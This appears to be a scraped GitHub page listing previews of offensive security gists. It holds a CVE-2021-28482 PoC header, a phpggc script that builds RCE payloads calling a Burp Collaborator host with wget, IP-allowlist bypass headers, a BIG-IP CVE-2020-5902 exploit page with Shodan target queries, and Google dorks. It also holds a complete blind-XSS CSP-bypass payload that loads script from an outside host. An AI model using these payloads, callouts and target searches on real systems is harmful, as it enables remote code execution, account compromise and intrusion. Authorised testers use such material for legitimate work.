Skip to content

Instantly share code, notes, and snippets.

View w9w's full-sized avatar

Max Yaremchuk w9w

88 followers · 17 following
View GitHub Profile
@cihanmehmet
cihanmehmet / ports.md
Last active March 12, 2026 09:27
TCP PORTS List

Most Popular TCP/UDP Ports

https://nmap.org/book/port-scanning.html#most-popular-ports

20,21,22,23,25,53,67,68,69,80,110,111,123,135,137,138,139,143,161,162,443,445,500,514,520,631,993,995,1434,1723,1900,3306,3389,4500,5900,8080,49152
20 21 22 23 25 53 67 68 69 80 110 111 123 135 137 138 139 143 161 162 443 445 500 514 520 631 993 995 1434 1723 1900 3306 3389 4500 5900 8080 49152
@testanull
testanull / PoC_CVE-2021-28482.py
Created May 2, 2021 11:10
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@honoki
honoki / phpggc-generate-payloads.sh
Last active December 10, 2025 07:40
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
#!/bin/bash
# phpggc wrapper that automatically generates payloads for RCE gadgets
function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"
# generate gadget chains
@kaimi-
kaimi- / gist:6b3c99538dce9e3d29ad647b325007c1
Last active March 2, 2026 14:20
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active December 31, 2024 19:04
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@securifera
securifera / Filename extension list
Created June 21, 2020 00:31
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
@sundowndev
sundowndev / GoogleDorking.md
Last active March 13, 2026 14:27
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@MatthewWilkes
MatthewWilkes / automated.py
Created January 24, 2019 16:30
Extract deleted commits from a GitHub repo
import argparse
import os
import re
import subprocess
import tempfile
import requests
def get_repo(owner, repo):
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_